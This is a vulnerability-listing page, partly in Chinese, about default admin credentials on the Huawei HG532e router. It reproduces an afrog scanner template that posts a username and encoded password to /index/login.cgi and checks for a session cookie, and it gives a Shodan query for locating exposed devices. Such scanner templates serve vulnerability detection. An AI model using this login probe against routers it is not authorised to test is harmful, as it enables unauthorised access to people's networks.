huawei-hg532e-default-login: Huawei HG532e Default Credential

日期: 2025-09-01 | 影响软件: Huawei HG532e | POC: 已公开

漏洞描述

Huawei HG532e default admin credentials were discovered. SHODAN: http.html:"HG532e"

PoC代码[已公开]

id: huawei-hg532e-default-login

info:
  name: Huawei HG532e Default Credential
  author: pussycat0x
  severity: high
  description: |
    Huawei HG532e default admin credentials were discovered.
    SHODAN: http.html:"HG532e"
  tags: default-login,huawei
  created: 2023/06/24

rules:
  r0:
    request:
      method: POST
      path: /index/login.cgi
      body: |
        Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D
    expression: response.status == 200 && response.body.ibcontains(b'<title>replace</title>') && response.headers["set-cookie"].contains('SessionID')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/huawei-hg532e-default-login.yaml

相关漏洞推荐